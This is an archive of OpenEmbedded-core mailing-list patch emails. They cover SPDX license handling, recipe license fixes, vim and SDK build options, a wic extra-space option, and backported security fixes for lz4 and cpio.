package_doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass") package_doc.creationInfo.creators.append("Organization: OpenEmbedded ()") package_doc.creationInfo.creators.append("Person: N/A ()") - -recipe_ref = oe.spdx.SPDXExternalDocumentRef() -recipe_ref.externalDocumentId = "DocumentRef-recipe-" + recipe.name -recipe_ref.spdxDocument = doc.documentNamespace -recipe_ref.checksum.algorithm = "SHA1" -recipe_ref.checksum.checksumValue = doc_sha1 - package_doc.externalDocumentRefs.append(recipe_ref) package_license = d.getVar("LICENSE:%s" % package) or d.getVar("LICENSE") @@ -498,7 +501,7 @@ python do_create_spdx() { spdx_package.SPDXID = oe.sbom.get_package_spdxid(pkg_name) spdx_package.name = pkg_name spdx_package.versionInfo = d.getVar("PV") -spdx_package.licenseDeclared = convert_license_to_spdx(package_license, package_doc, d) +spdx_package.licenseDeclared = convert_license_to_spdx(package_license, package_doc, d, found_licenses) package_doc.packages.append(spdx_package) -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155681): https://lists.openembedded.org/g/openembedded-core/message/155681 Mute This Topic: https://lists.openembedded.org/mt/85355094/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH v2 2/4] create-spdx: remove redundant test
add_extracted_document() is only called if the license isn't known to SPDX, so there's no need to check again. Signed-off-by: Ross Burton --- meta/classes/create-spdx.bbclass | 3 --- 1 file changed, 3 deletions(-) diff --git a/meta/classes/create-spdx.bbclass b/meta/classes/create-spdx.bbclass index 73ccb3c990f..529dee22918 100644 --- a/meta/classes/create-spdx.bbclass +++ b/meta/classes/create-spdx.bbclass @@ -58,9 +58,6 @@ def convert_license_to_spdx(lic, document, d): def add_extracted_license(ident, name, text): nonlocal document -if ident in license_data["licenses"]: -return False - spdx_lic = oe.spdx.SPDXExtractedLicensingInfo() spdx_lic.name = name spdx_lic.licenseId = ident -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155678): https://lists.openembedded.org/g/openembedded-core/message/155678 Mute This Topic: https://lists.openembedded.org/mt/85355091/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 2/2] create-spex: don't duplicate license texts in each package
Instead of putting the full license text for non-SPDX licenses into the recipe and every package, use links to the recipe from the packages if possible. Signed-off-by: Ross Burton --- meta/classes/create-spdx.bbclass | 25 ++--- 1 file changed, 14 insertions(+), 11 deletions(-) diff --git a/meta/classes/create-spdx.bbclass b/meta/classes/create-spdx.bbclass index cbb9239991c..1e0b3605587 100644 --- a/meta/classes/create-spdx.bbclass +++ b/meta/classes/create-spdx.bbclass @@ -50,7 +50,7 @@ python() { d.setVar("SPDX_LICENSE_DATA", data) } -def convert_license_to_spdx(lic, document, d): +def convert_license_to_spdx(lic, document, d, existing={}): from pathlib import Path import oe.spdx @@ -109,8 +109,11 @@ def convert_license_to_spdx(lic, document, d): if spdx_license in license_data["licenses"]: return spdx_license -spdx_license = "LicenseRef-" + l -add_extracted_license(spdx_license, l) +try: +spdx_license = existing[l] +except KeyError: +spdx_license = "LicenseRef-" + l +add_extracted_license(spdx_license, l) return spdx_license @@ -462,7 +465,14 @@ python do_create_spdx() { doc_sha1 = oe.sbom.write_doc(d, doc, "recipes") dep_recipes.append(oe.sbom.DepRecipe(doc, doc_sha1, recipe)) +recipe_ref = oe.spdx.SPDXExternalDocumentRef() +recipe_ref.externalDocumentId = "DocumentRef-recipe-" + recipe.name +recipe_ref.spdxDocument = doc.documentNamespace +recipe_ref.checksum.algorithm = "SHA1" +recipe_ref.checksum.checksumValue = doc_sha1 + sources = collect_dep_sources(d, dep_recipes) +found_licenses = {license.name:recipe_ref.externalDocumentId + ":" + license.licenseId for license in doc.hasExtractedLicensingInfos} if not is_native: bb.build.exec_func("read_subpackage_metadata", d) @@ -482,13 +492,6 @@ python do_create_spdx() { package_doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass") package_doc.creationInfo.creators.append("Organization: OpenEmbedded ()") package_doc.creationInfo.creators.append("Person: N/A ()") - -recipe_ref = oe.spdx.SPDXExternalDocumentRef() -recipe_ref.externalDocumentId = "DocumentRef-recipe-" + recipe.name -recipe_ref.spdxDocument = doc.documentNamespace -recipe_ref.checksum.algorithm = "SHA1" -recipe_ref.checksum.checksumValue = doc_sha1 - package_doc.externalDocumentRefs.append(recipe_ref) package_license = d.getVar("LICENSE:%s" % package) or d.getVar("LICENSE") @@ -498,7 +501,7 @@ python do_create_spdx() { spdx_package.SPDXID = oe.sbom.get_package_spdxid(pkg_name) spdx_package.name = pkg_name spdx_package.versionInfo = d.getVar("PV") -spdx_package.licenseDeclared = convert_license_to_spdx(package_license, package_doc, d) +spdx_package.licenseDeclared = convert_license_to_spdx(package_license, package_doc, d, found_licenses) package_doc.packages.append(spdx_package) -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155677): https://lists.openembedded.org/g/openembedded-core/message/155677 Mute This Topic: https://lists.openembedded.org/mt/85354189/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH 1/2] oeqa/selftest/recipetool: update for license changes
Now that recipetool writes BSD-3-Clause, update the test appropriately. Signed-off-by: Ross Burton --- meta/lib/oeqa/selftest/cases/recipetool.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/meta/lib/oeqa/selftest/cases/recipetool.py b/meta/lib/oeqa/selftest/cases/recipetool.py index 6f531dfa364..c2a53815d0e 100644 --- a/meta/lib/oeqa/selftest/cases/recipetool.py +++ b/meta/lib/oeqa/selftest/cases/recipetool.py @@ -481,7 +481,7 @@ class RecipetoolTests(RecipetoolBase): result = runCmd('recipetool create -o %s %s' % (temprecipe, srcuri)) self.assertTrue(os.path.isfile(recipefile)) checkvars = {} -checkvars['LICENSE'] = set(['PSF', '&', 'BSD', 'GPL']) +checkvars['LICENSE'] = set(['PSF', '&', 'BSD-3-Clause', 'GPL']) checkvars['LIC_FILES_CHKSUM'] = 'file://COPYING.txt;md5=35a23d42b615470583563132872c97d6' checkvars['SRC_URI'] = 'https://files.pythonhosted.org/packages/84/f4/5771e41fdf52aabebbadecc9381d11dea0fa34e4759b4071244fa094804c/docutils-${PV}.tar.gz' checkvars['SRC_URI[md5sum]'] = 'c53768d63db3873b7d452833553469de' -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155676): https://lists.openembedded.org/g/openembedded-core/message/155676 Mute This Topic: https://lists.openembedded.org/mt/85354188/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH v2] xinetd: correct LICENSE
The xinetd license is superficially BSD-like, but it isn't BSD. Now that we have the full SPDX license set in oe-core, use the specific xinetd license. Signed-off-by: Ross Burton --- meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb b/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb index e6ef5cf8b9a..ec90de830d0 100644 --- a/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb +++ b/meta/recipes-extended/xinetd/xinetd_2.3.15.4.bb @@ -2,9 +2,7 @@ SUMMARY = "Socket-based service activation daemon" HOMEPAGE = "https://github.com/xinetd-org/xinetd; DESCRIPTION = "xinetd is a powerful replacement for inetd, xinetd has access control mechanisms, extensive logging capabilities, the ability to make services available based on time, can place limits on the number of servers that can be started, and has deployable defence mechanisms to protect against port scanners, among other things." -# xinetd is a BSD-like license -# Apple and Gentoo say BSD here. -LICENSE = "BSD" +LICENSE = "xinetd" LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=55c5fdf02cfcca3fc9621b6f2ceae10f" UPSTREAM_CHECK_GITTAGREGEX = "(?P\d+(\.\d+)+)" -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155675): https://lists.openembedded.org/g/openembedded-core/message/155675 Mute This Topic: https://lists.openembedded.org/mt/85352871/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core][dunfell 5/5] layer.conf: fix syntax error in PATH setting
From: Matt Madison Commit 05a87be51b44608ce4f77ac332df90a3cd2445ef introduced a Python conditional expression when updating PATH that generates syntax warnings in bitbake-cookerdaemon.log: Var :1: SyntaxWarning: "is not" with a literal. Did you mean "!="? Fix this by using the more appropriate '!=' comparison operator. Signed-off-by: Matt Madison Signed-off-by: Richard Purdie (cherry picked from commit 2e753a12cf6bb98f9e0940e5ed6255ce8c538eed) Signed-off-by: Steve Sakoman --- meta/conf/layer.conf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/meta/conf/layer.conf b/meta/conf/layer.conf index 1c432275be..7453655417 100644 --- a/meta/conf/layer.conf +++ b/meta/conf/layer.conf @@ -102,4 +102,4 @@ SSTATE_EXCLUDEDEPS_SYSROOT += ".*->autoconf-archive-native" # We need to keep bitbake tools in PATH # Avoid empty path entries BITBAKEPATH := "${@os.path.dirname(bb.utils.which(d.getVar('PATH'),'bitbake'))}" -PATH := "${@'${BITBAKEPATH}:' if '${BITBAKEPATH}' is not '' else ''}${HOSTTOOLS_DIR}" +PATH := "${@'${BITBAKEPATH}:' if '${BITBAKEPATH}' != '' else ''}${HOSTTOOLS_DIR}" -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155674): https://lists.openembedded.org/g/openembedded-core/message/155674 Mute This Topic: https://lists.openembedded.org/mt/85352579/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core][dunfell 4/5] vim: add option to disable NLS support
From: Andrej Valek - Some distributions with UTF-8 locale have problem when National Language Support is enabled. Add there an option to disable it. Signed-off-by: Andrej Valek Signed-off-by: Richard Purdie (cherry picked from commit da630d6d81a396c3e1635fbd7b8103df47ed2732) Signed-off-by: Steve Sakoman --- meta/recipes-support/vim/vim.inc | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/meta/recipes-support/vim/vim.inc b/meta/recipes-support/vim/vim.inc index 878d0f18ae..6fe8fb90db 100644 --- a/meta/recipes-support/vim/vim.inc +++ b/meta/recipes-support/vim/vim.inc @@ -54,11 +54,12 @@ do_compile() { autotools_do_compile } -#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny +#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny selinux, elfutils, nls PACKAGECONFIG ??= "" PACKAGECONFIG += " \ ${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)} \ ${@bb.utils.contains('DISTRO_FEATURES', 'x11', 'x11 gtkgui', '', d)} \ +nls \ " PACKAGECONFIG[gtkgui] = "--enable-gui=gtk3,--enable-gui=no,gtk+3" @@ -67,6 +68,7 @@ PACKAGECONFIG[x11] = "--with-x,--without-x,xt," PACKAGECONFIG[tiny] = "--with-features=tiny,--with-features=big,," PACKAGECONFIG[selinux] = "--enable-selinux,--disable-selinux,libselinux," PACKAGECONFIG[elfutils] = "--enable-elf-check,,elfutils," +PACKAGECONFIG[nls] = "--enable-nls,--disable-nls,," EXTRA_OECONF = " \ --disable-gpm \ -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155673): https://lists.openembedded.org/g/openembedded-core/message/155673 Mute This Topic: https://lists.openembedded.org/mt/85352575/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core][dunfell 3/5] lz4: Security Fix for CVE-2021-3520
From: Armin Kuster Source: https://github.com/lz4/lz4 MR: 111604 Type: Security Fix Disposition: Backport from https://github.com/lz4/lz4/commit/8301a21773ef61656225e264f4f06ae14462bca7#diff-7055e9cf14c488aea9837aaf9f528b58ee3c22988d7d0d81d172ec62d94a88a7 ChangeID: 58492f950164e75954a97cf084df6f9af3d88244 Description: Signed-off-by: Armin Kuster Signed-off-by: Steve Sakoman --- .../lz4/files/CVE-2021-3520.patch | 27 +++ meta/recipes-support/lz4/lz4_1.9.2.bb | 1 + 2 files changed, 28 insertions(+) create mode 100644 meta/recipes-support/lz4/files/CVE-2021-3520.patch diff --git a/meta/recipes-support/lz4/files/CVE-2021-3520.patch b/meta/recipes-support/lz4/files/CVE-2021-3520.patch new file mode 100644 index 00..5ac8f6691f --- /dev/null +++ b/meta/recipes-support/lz4/files/CVE-2021-3520.patch @@ -0,0 +1,27 @@ +From 8301a21773ef61656225e264f4f06ae14462bca7 Mon Sep 17 00:00:00 2001 +From: Jasper Lievisse Adriaanse +Date: Fri, 26 Feb 2021 15:21:20 +0100 +Subject: [PATCH] Fix potential memory corruption with negative memmove() size + +Upstream-Status: Backport +https://github.com/lz4/lz4/commit/8301a21773ef61656225e264f4f06ae14462bca7#diff-7055e9cf14c488aea9837aaf9f528b58ee3c22988d7d0d81d172ec62d94a88a7 +CVE: CVE-2021-3520 +Signed-off-by: Armin Kuster + +--- + lib/lz4.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: git/lib/lz4.c +=== +--- git.orig/lib/lz4.c git/lib/lz4.c +@@ -1665,7 +1665,7 @@ LZ4_decompress_generic( + const size_t dictSize /* note : = 0 if noDict */ + ) + { +-if (src == NULL) { return -1; } ++if ((src == NULL) || (outputSize < 0)) { return -1; } + + { const BYTE* ip = (const BYTE*) src; + const BYTE* const iend = ip + srcSize; diff --git a/meta/recipes-support/lz4/lz4_1.9.2.bb b/meta/recipes-support/lz4/lz4_1.9.2.bb index 20719fcc58..546bed39b0 100644 --- a/meta/recipes-support/lz4/lz4_1.9.2.bb +++ b/meta/recipes-support/lz4/lz4_1.9.2.bb @@ -14,6 +14,7 @@ SRCREV = "fdf2ef5809ca875c454510610764d9125ef2ebbd" SRC_URI = "git://github.com/lz4/lz4.git;branch=dev \ file://run-ptest \ + file://CVE-2021-3520.patch \ " UPSTREAM_CHECK_GITTAGREGEX = "v(?P.*)" -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155672): https://lists.openembedded.org/g/openembedded-core/message/155672 Mute This Topic: https://lists.openembedded.org/mt/85352570/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core][dunfell 2/5] cpio: backport fix for CVE-2021-38185
From: Ross Burton Signed-off-by: Ross Burton Signed-off-by: Richard Purdie (cherry picked from commit 4accf77ea5b5810cb2330acc6773690ec1b1c71b) Signed-off-by: Steve Sakoman --- .../cpio/cpio-2.13/CVE-2021-38185.patch | 581 ++ meta/recipes-extended/cpio/cpio_2.13.bb | 1 + 2 files changed, 582 insertions(+) create mode 100644 meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch diff --git a/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch new file mode 100644 index 00..6ceafeee49 --- /dev/null +++ b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch @@ -0,0 +1,581 @@ +GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted +pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers +an out-of-bounds heap write. + +CVE: CVE-2021-38185 +Upstream-Status: Backport +Signed-off-by: Ross Burton + +From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff +Date: Sat, 7 Aug 2021 12:52:21 +0300 +Subject: [PATCH 1/3] Rewrite dynamic string support. + +* src/dstring.c (ds_init): Take a single argument. +(ds_free): New function. +(ds_resize): Take a single argument. Use x2nrealloc to expand +the storage. +(ds_reset,ds_append,ds_concat,ds_endswith): New function. +(ds_fgetstr): Rewrite. In particular, this fixes integer overflow. +* src/dstring.h (dynamic_string): Keep both the allocated length +(ds_size) and index of the next free byte in the string (ds_idx). +(ds_init,ds_resize): Change signature. +(ds_len): New macro. +(ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos. +* src/copyin.c: Use new ds_ functions. +* src/copyout.c: Likewise. +* src/copypass.c: Likewise. +* src/util.c: Likewise. +--- + src/copyin.c | 40 +++ + src/copyout.c | 16 - + src/copypass.c | 34 +-- + src/dstring.c | 88 -- + src/dstring.h | 31 +- + src/util.c | 6 ++-- + 6 files changed, 123 insertions(+), 92 deletions(-) + +diff --git a/src/copyin.c b/src/copyin.c +index b29f348..37e503a 100644 +--- a/src/copyin.c b/src/copyin.c +@@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out, + char *str_res; /* Result for string function. */ + static dynamic_string new_name; /* New file name for rename option. */ + static int initialized_new_name = false; ++ + if (!initialized_new_name) +- { +-ds_init (_name, 128); +-initialized_new_name = true; +- } ++{ ++ ds_init (_name); ++ initialized_new_name = true; ++} + + if (rename_flag) + { +@@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name) +already in `save_patterns' (from the command line) are preserved. */ + + static void +-read_pattern_file () ++read_pattern_file (void) + { +- int max_new_patterns; +- char **new_save_patterns; +- int new_num_patterns; ++ char **new_save_patterns = NULL; ++ size_t max_new_patterns; ++ size_t new_num_patterns; + int i; +- dynamic_string pattern_name; ++ dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER; + FILE *pattern_fp; + + if (num_patterns < 0) + num_patterns = 0; +- max_new_patterns = 1 + num_patterns; +- new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *)); + new_num_patterns = num_patterns; +- ds_init (_name, 128); ++ max_new_patterns = num_patterns; ++ new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0])); + + pattern_fp = fopen (pattern_file_name, "r"); + if (pattern_fp == NULL) + open_fatal (pattern_file_name); + while (ds_fgetstr (pattern_fp, _name, '\n') != NULL) + { +- if (new_num_patterns >= max_new_patterns) +- { +-max_new_patterns += 1; +-new_save_patterns = (char **) +- xrealloc ((char *) new_save_patterns, +-max_new_patterns * sizeof (char *)); +- } ++ if (new_num_patterns == max_new_patterns) ++ new_save_patterns = x2nrealloc (new_save_patterns, ++ _new_patterns, ++ sizeof (new_save_patterns[0])); + new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string); + ++new_num_patterns; + } ++ ++ ds_free (_name); ++ + if (ferror (pattern_fp) || fclose (pattern_fp) == EOF) + close_error (pattern_file_name); + +@@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count) +in the file system. */ + + void +-process_copy_in () ++process_copy_in (void) + { + char done = false; /* True if trailer reached. */ + FILE *tty_in = NULL;/* Interactive file for rename option. */ +diff --git a/src/copyout.c b/src/copyout.c +index 8b0beb6..26e3dda 100644 +--- a/src/copyout.c
[OE-core][dunfell 1/5] sdk: Decouple default install path from built in path
From: Richard Purdie Add SDKPATHINSTALL which is used as the default install location of the SDK instead of SDKPATH. This means the default install path isn't encoded into every SDK binary, meaning if a date is used there the entire SDK doesn't have to rebuild. Most distros can switch to only customise SDKPATHINSTALL meaning more sstate reuse too. [YOCTO #14100] Signed-off-by: Richard Purdie (cherry picked from commit bc4ee5453560dcefc4a4ecc5657df5cc1666e153) Signed-off-by: Steve Sakoman --- meta/classes/populate_sdk_base.bbclass | 1 + meta/conf/bitbake.conf | 4 +++- meta/files/toolchain-shar-extract.sh | 3 ++- meta/files/toolchain-shar-relocate.sh | 2 +- 4 files changed, 7 insertions(+), 3 deletions(-) diff --git a/meta/classes/populate_sdk_base.bbclass b/meta/classes/populate_sdk_base.bbclass index b46f1aed27..396792f0f7 100644 --- a/meta/classes/populate_sdk_base.bbclass +++ b/meta/classes/populate_sdk_base.bbclass @@ -275,6 +275,7 @@ EOF # substitute variables sed -i -e 's#@SDK_ARCH@#${SDK_ARCH}#g' \ -e 's#@SDKPATH@#${SDKPATH}#g' \ + -e 's#@SDKPATHINSTALL@#${SDKPATHINSTALL}#g' \ -e 's#@SDKEXTPATH@#${SDKEXTPATH}#g' \ -e 's#@OLDEST_KERNEL@#${SDK_OLDEST_KERNEL}#g' \ -e 's#@REAL_MULTIMACH_TARGET_SYS@#${REAL_MULTIMACH_TARGET_SYS}#g' \ diff --git a/meta/conf/bitbake.conf b/meta/conf/bitbake.conf index 0141919021..f442a6593a 100644 --- a/meta/conf/bitbake.conf +++ b/meta/conf/bitbake.conf @@ -421,8 +421,10 @@ PKGDATA_DIR = "${TMPDIR}/pkgdata/${MACHINE}" SDK_NAME_PREFIX ?= "oecore" SDK_NAME = "${SDK_NAME_PREFIX}-${SDK_ARCH}-${TUNE_PKGARCH}" -SDKPATH = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}" +SDKPATH = "/usr/local/oe-sdk-hardcoded-buildpath" SDKPATHNATIVE = "${SDKPATH}/sysroots/${SDK_SYS}" +# The path to default to installing the SDK to +SDKPATHINSTALL = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}" ## # Kernel info. diff --git a/meta/files/toolchain-shar-extract.sh b/meta/files/toolchain-shar-extract.sh index dd9342758b..4386b985bb 100644 --- a/meta/files/toolchain-shar-extract.sh +++ b/meta/files/toolchain-shar-extract.sh @@ -56,7 +56,8 @@ if ! xz -V > /dev/null 2>&1; then exit 1 fi -DEFAULT_INSTALL_DIR="@SDKPATH@" +SDK_BUILD_PATH="@SDKPATH@" +DEFAULT_INSTALL_DIR="@SDKPATHINSTALL@" SUDO_EXEC="" EXTRA_TAR_OPTIONS="" target_sdk_dir="" diff --git a/meta/files/toolchain-shar-relocate.sh b/meta/files/toolchain-shar-relocate.sh index ba873373e2..3ece04db0a 100644 --- a/meta/files/toolchain-shar-relocate.sh +++ b/meta/files/toolchain-shar-relocate.sh @@ -61,7 +61,7 @@ done | xargs -n100 file | grep ":.*\(ASCII\|script\|source\).*text" | \ -e "$target_sdk_dir/post-relocate-setup" \ -e "$target_sdk_dir/${0##*/}" | \ xargs -n100 $SUDO_EXEC sed -i \ --e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:g" \ +-e "s:$SDK_BUILD_PATH:$target_sdk_dir:g" \ -e "s:^#! */usr/bin/perl.*:#! /usr/bin/env perl:g" \ -e "s: /usr/bin/perl: /usr/bin/env perl:g" -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155670): https://lists.openembedded.org/g/openembedded-core/message/155670 Mute This Topic: https://lists.openembedded.org/mt/85352560/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core][dunfell 0/5] Patch review
Please review this next set of patches for dunfell and have comments back by end of day Monday. Passed a-full on autobuilder: https://autobuilder.yoctoproject.org/typhoon/#/builders/83/builds/2540 The following changes since commit 448e0271ed831582bb5833486fc17b131676fb53: selftest: disable virgl headless test (2021-08-27 04:58:08 -1000) are available in the Git repository at: git://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut Andrej Valek (1): vim: add option to disable NLS support Armin Kuster (1): lz4: Security Fix for CVE-2021-3520 Matt Madison (1): layer.conf: fix syntax error in PATH setting Richard Purdie (1): sdk: Decouple default install path from built in path Ross Burton (1): cpio: backport fix for CVE-2021-38185 meta/classes/populate_sdk_base.bbclass| 1 + meta/conf/bitbake.conf| 4 +- meta/conf/layer.conf | 2 +- meta/files/toolchain-shar-extract.sh | 3 +- meta/files/toolchain-shar-relocate.sh | 2 +- .../cpio/cpio-2.13/CVE-2021-38185.patch | 581 ++ meta/recipes-extended/cpio/cpio_2.13.bb | 1 + .../lz4/files/CVE-2021-3520.patch | 27 + meta/recipes-support/lz4/lz4_1.9.2.bb | 1 + meta/recipes-support/vim/vim.inc | 4 +- 10 files changed, 621 insertions(+), 5 deletions(-) create mode 100644 meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch create mode 100644 meta/recipes-support/lz4/files/CVE-2021-3520.patch -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155669): https://lists.openembedded.org/g/openembedded-core/message/155669 Mute This Topic: https://lists.openembedded.org/mt/85352557/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH v2] wic: Add extra-space argument
This allows extra space to be added after the last partition and is especially useful when free space is needed for ex: adding partitions on first boot with ex: systemd-repart[1] and the image is tested in QEMU. [1] https://www.freedesktop.org/software/systemd/man/systemd-repart.html Signed-off-by: Kristian Klausen --- V2: Add test case. I'm not sure how to test this best, so for now I'm just testing imagesize > --extra-space size. meta/lib/oeqa/selftest/cases/wic.py | 11 +++ scripts/lib/wic/plugins/imager/direct.py | 7 +-- scripts/wic | 2 ++ 3 files changed, 18 insertions(+), 2 deletions(-) diff --git a/meta/lib/oeqa/selftest/cases/wic.py b/meta/lib/oeqa/selftest/cases/wic.py index 3b4143414f..dc7b9e637e 100644 --- a/meta/lib/oeqa/selftest/cases/wic.py +++ b/meta/lib/oeqa/selftest/cases/wic.py @@ -744,6 +744,17 @@ part /etc --source rootfs --fstype=ext4 --change-directory=etc % (wks_file, self.resultdir), ignore_status=True).status) os.remove(wks_file) +def test_extra_space(self): +"""Test --extra-space wks option.""" +extraspace = 1024**3 +runCmd("wic create wictestdisk " + "--image-name core-image-minimal " + "--extra-space %i -o %s" % (extraspace ,self.resultdir)) +wicout = glob(self.resultdir + "wictestdisk-*.direct") +self.assertEqual(1, len(wicout)) +size = os.path.getsize(wicout[0]) +self.assertTrue(size > extraspace) + class Wic2(WicTestCase): def test_bmap_short(self): diff --git a/scripts/lib/wic/plugins/imager/direct.py b/scripts/lib/wic/plugins/imager/direct.py index 96168aadb4..9d10ec01d0 100644 --- a/scripts/lib/wic/plugins/imager/direct.py +++ b/scripts/lib/wic/plugins/imager/direct.py @@ -77,7 +77,8 @@ class DirectPlugin(ImagerPlugin): image_path = self._full_path(self.workdir, self.parts[0].disk, "direct") self._image = PartitionedImage(image_path, self.ptable_format, - self.parts, self.native_sysroot) + self.parts, self.native_sysroot, + options.extra_space) def setup_workdir(self, workdir): if workdir: @@ -293,7 +294,7 @@ class PartitionedImage(): Partitioned image in a file. """ -def __init__(self, path, ptable_format, partitions, native_sysroot=None): +def __init__(self, path, ptable_format, partitions, native_sysroot=None, extra_space=0): self.path = path # Path to the image file self.numpart = 0 # Number of allocated partitions self.realpart = 0 # Number of partitions in the partition table @@ -314,6 +315,7 @@ class PartitionedImage(): self.sector_size = SECTOR_SIZE self.native_sysroot = native_sysroot num_real_partitions = len([p for p in self.partitions if not p.no_table]) +self.extra_space = extra_space # calculate the real partition number, accounting for partitions not # in the partition table and logical partitions @@ -483,6 +485,7 @@ class PartitionedImage(): self.min_size += GPT_OVERHEAD self.min_size *= self.sector_size +self.min_size += self.extra_space def _create_partition(self, device, parttype, fstype, start, size): """ Create a partition on an image described by the 'device' object. """ diff --git a/scripts/wic b/scripts/wic index a741aed364..57197c2048 100755 --- a/scripts/wic +++ b/scripts/wic @@ -346,6 +346,8 @@ def wic_init_parser_create(subparser): default=False, help="output debug information") subparser.add_argument("-i", "--imager", dest="imager", default="direct", help="the wic imager plugin") +subparser.add_argument("--extra-space", type=int, dest="extra_space", + default=0, help="additional free disk space to add to the image") return -- 2.25.1 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155668): https://lists.openembedded.org/g/openembedded-core/message/155668 Mute This Topic: https://lists.openembedded.org/mt/85352095/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH] systemd: Add homed PACKAGECONFIG
